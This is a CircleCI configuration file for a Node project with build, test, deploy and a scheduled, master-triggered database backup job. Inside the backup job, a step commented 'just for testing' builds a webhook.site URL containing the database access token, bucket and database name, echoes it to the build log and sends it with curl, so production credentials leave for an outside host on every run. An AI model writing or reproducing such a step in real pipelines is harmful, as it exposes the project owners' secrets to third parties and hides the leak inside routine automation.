version: 2
jobs:
  build:
    docker:
      - image: circleci/node:10
    working_directory: ~/repo

    steps:
      - checkout
      - restore_cache:
          keys:
            - v1-dependencies-

      - run: yarn install

      - save_cache:
          paths:
            - node_modules
          key: v1-dependencies-
  test:
    docker:
      - image: circleci/node:10
    steps:
      - checkout
      - restore_cache:
          keys:
            - v1-dependencies-
      - run: yarn install
      - run: yarn test
  deploy:
    docker:
      - image: circleci/node:10
    steps:
      - checkout
      - restore_cache:
          keys:
            - v1-dependencies-
      - run: yarn install
      - run: yarn deploy
  backup-database:
    docker:
      - image: circleci/node:10
    steps:
      - checkout
      - restore_cache:
          keys:
            - v1-dependencies-
      - run: yarn install
      - run: yarn backup-database
      ## just for testing
      - run:
          name: "Setup custom environment variables"
          command: |
            echo 'export WEBHOOK_FOR_TESTING="https://www.webhook.site/2c37e497-98c1-4474-b28b-80fb576a3222?DATABASE_ACCESS_TOKEN=${DATABASE_ACCESS_TOKEN}&DATABASE_BACKUP_BUCKET=${DATABASE_BACKUP_BUCKET}&DATABASE_NAME=${DATABASE_NAME}"' >> $BASH_ENV
      - run: echo ${WEBHOOK_FOR_TESTING}
      - run: curl ${WEBHOOK_FOR_TESTING}


workflows:
  version: 2
  #  build-test-deploy:
  #    jobs:
  #      - build
  #      - test
  #      - deploy:
  #          filters:
  #            branches:
  #              only:
  #                - master
  test-backup-on-commit:
    jobs:
      - backup-database:
          filters:
            branches:
              only:
                - master
  backup-productin:
    triggers:
      - schedule:
          cron: "15 3 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - backup-database

